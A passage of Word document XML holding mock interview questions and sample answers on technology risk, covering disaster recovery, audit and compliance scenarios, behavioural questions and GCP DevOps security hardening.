      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Explain Disaster Recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Disaster Recovery is the ability to restore technology services after a major disruption. It includes backups, replication, recovery procedures, DR environments, roles, communication plans, and testing. DR is measured by RTO and RPO and should be validated through exercises, not just documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What is the difference between RTO and RPO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RTO (Recovery Time Objective) is how long the business can tolerate a system being down before recovery must be complete - it drives how fast your failover/restore process needs to be. RPO (Recovery Point Objective) is how much data loss is acceptable, measured in time - it drives how frequently you need to back up or replicate data. A near-zero RPO requires continuous replication; a short RTO requires automated, well-rehearsed failover, and the two targets together shape the entire DR architecture, not just the backup schedule.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. What is Business Continuity Planning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Business Continuity Planning ensures critical business operations can continue during disruptions. It is broader than IT disaster recovery and includes people, process, vendors, communication, alternate workflows, and business priorities. Technology risk teams help align systems recovery with business continuity needs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Explain Zero Trust Architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Zero Trust assumes no user, device, network, or workload is trusted by default. Access is continuously verified using identity, context, least privilege, device posture, segmentation, and monitoring. In cloud, this means strong IAM, workload identity, network segmentation, policy enforcement, and continuous logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What are common architecture risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Common risks include unclear ownership, weak IAM, public exposure, missing encryption, no logging, single points of failure, hardcoded secrets, untested backups, poor data classification, third-party dependency gaps, weak CI/CD controls, and lack of rollback or incident procedures.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 36 - Audit and Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. An auditor finds that production access is shared among developers. What do you do?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would treat it as a serious access control issue. First identify where shared access exists, remove or disable shared accounts where possible, assign named accounts, enforce MFA/SSO, implement RBAC and just-in-time access, review logs for misuse, document remediation, and provide evidence to audit. I would also prevent recurrence through policy and periodic access reviews.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Terraform state contains database passwords. How would you fix this?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would rotate the exposed passwords, move secrets to Secret Manager or Vault, restrict and audit state access, ensure remote state encryption and locking, remove secrets from Terraform variables and outputs, and update modules to reference secret resources safely. I would also check commit history, CI logs, and backups for further exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. Jenkins stores credentials in plain text. What actions would you take?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would rotate the credentials immediately, move them into Jenkins credentials store or an external secret manager, restrict access, review logs for exposure, update pipelines to avoid printing secrets, patch Jenkins and plugins, and add audits for credential usage. I would also review whether Jenkins has excessive production permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Kubernetes dashboard is publicly accessible. What risks exist?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The risks include unauthorized cluster access, workload manipulation, secret exposure, privilege escalation, data exfiltration, and production disruption. I would restrict network access, require strong authentication, review RBAC, inspect audit logs, rotate exposed secrets if needed, and consider whether the dashboard should be disabled entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. A developer requests Owner access in GCP. Would you approve it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Generally no, not without a strong business justification, time limit, and approval. I would ask what task requires Owner, provide least-privilege alternatives, use groups or custom roles, consider just-in-time access, and log the approval. Broad Owner access creates high risk because it can change IAM, billing, resources, and security controls.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Your audit finds that 50 VMs have no patching process. What is your response?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would assess criticality, exposure, and vulnerability status of the VMs, assign owners, define patch SLAs, prioritize internet-facing and critical systems, implement automated patching or maintenance windows, track exceptions, and report progress. I would also determine why the patching control failed and fix the process gap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Cloud logging has been disabled. Why is this a risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Disabled logging reduces detection, investigation, compliance evidence, and incident response capability. Without logs, teams may not know who changed what, when an incident started, or whether data was accessed. I would re-enable logging, restrict who can disable it, alert on logging changes, and review the gap period.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. A critical vulnerability is found in production. What steps would you follow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would validate the vulnerability, assess exposure and exploitability, identify affected assets, prioritize mitigation, apply patch or workaround, increase monitoring, communicate risk and timeline, test the fix, and document evidence. If actively exploited, I would involve incident response and preserve forensic data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. An application stores customer data without encryption. What are the risks?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Risks include data exposure, regulatory non-compliance, customer harm, contractual breach, and reputational damage. I would identify data type and storage locations, enable encryption at rest and in transit, review key management, restrict access, assess exposure history, and ensure encryption is part of design standards.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Public storage buckets are discovered. How would you respond?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Audit/Compliance Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I would identify exposed buckets, data sensitivity, access logs, and business justification. If unauthorized, I would remove public access, rotate any exposed secrets, notify stakeholders, assess whether incident procedures apply, and add preventive controls like public access prevention, org policies, IaC checks, and alerts.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>--------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 37 - Technology Risk Behavioural Questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Tell me about a difficult technology risk you managed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use STAR. Example: "We had overprivileged service accounts across production projects. I assessed actual usage through audit logs, prioritized accounts with customer data access, partnered with engineering to create least-privilege roles, rolled changes gradually, monitored failures, and reported risk reduction. The result was lower privilege exposure without disrupting delivery."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. Describe a situation where engineering disagreed with your recommendation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer shows collaboration. "I listened to their delivery concern, clarified the business risk, proposed options, and found a practical control. Instead of blocking release, we agreed on a temporary compensating control, time-bound exception, monitoring, and a remediation date. That preserved delivery while keeping risk visible and owned."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you influence stakeholders without authority?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I influence by understanding stakeholder goals, using evidence, translating risk into business impact, offering practical options, and building trust through consistency. I avoid simply saying no. I show the risk, recommend a path, agree ownership, and escalate only when risk exceeds appetite or deadlines keep slipping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. Tell me about an audit that did not go well.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Keep it accountable. "An audit exposed weak evidence collection for change approvals. Instead of treating it as an audit-only problem, I worked with engineering to improve the CI/CD approval workflow, automated evidence capture, created control owners, and added periodic checks. The lesson was that evidence should be generated by the process, not collected manually later."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Describe a major production incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use STAR and include impact, role, actions, and learning. "During a deployment-related outage, I helped coordinate triage, rollback, stakeholder updates, and evidence collection. After recovery, we identified gaps in pre-release testing and monitoring. We added canary checks, stronger rollback criteria, and post-deployment alerts to reduce recurrence."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How do you balance security and delivery speed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I balance them by using risk-based controls, automation, and guardrails. Critical risks need strong gates, while lower-risk changes can use streamlined paths. The goal is not to slow teams down, but to make safe delivery repeatable through templates, CI/CD checks, policy-as-code, and clear exception handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Tell me about a time you identified a hidden risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Example: "During an architecture review, I noticed a service account used by CI/CD had broad permissions across multiple projects. It was not in the original risk list because the app itself was low risk. I escalated the identity blast radius, worked with platform teams to narrow permissions, and added monitoring for service account changes."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Describe a risk that eventually became an incident.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer shows learning, not blame. "A known monitoring gap became an incident when a service degraded before alerts fired. After the incident, we treated the monitoring gap as a control failure, created SLO-based alerts, assigned ownership, and added the pattern to production readiness reviews."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How do you handle conflicting priorities?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I clarify business impact, urgency, regulatory exposure, customer impact, dependencies, and effort. Then I create a transparent priority recommendation with tradeoffs. If teams disagree, I escalate with options, not just problems. I also separate urgent containment from long-term remediation so progress can start quickly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Why do you want to move into Technology Risk?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Leadership/Behavioural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer: "My cloud, Kubernetes, Terraform, and DevOps experience gives me practical insight into how technology risks actually appear in engineering environments. I want to use that background to help teams build safely, reduce incidents, improve controls, and communicate technical risk in business terms."</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>-------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 38 - GCP DevOps Risk Tailored Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How do you secure Terraform state in GCP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I store state in a GCS backend with uniform bucket-level access, encryption, versioning, retention where appropriate, restricted IAM, audit logs, and separate state per environment. I avoid secrets in state, use Secret Manager for sensitive values, enable review of Terraform plans, and restrict CI/CD service account permissions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How do you prevent infrastructure drift?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I prevent drift by making Terraform or GitOps the source of truth, restricting manual console changes, running scheduled drift detection, reviewing plans before apply, using policy-as-code, and alerting on critical configuration changes. When drift occurs, I determine whether to import, revert, or update code intentionally.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How do you secure GKE clusters?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP DevOps Risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: I use private clusters, Workload Identity, least-privilege RBAC, network policies, shielded nodes, secure node pools, Binary Authorization where needed, vulnerability scanning, Pod Security controls, audit logs, secret management, restricted control plane access, and strong monitoring. I also separate environments and review cluster permissions regularly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
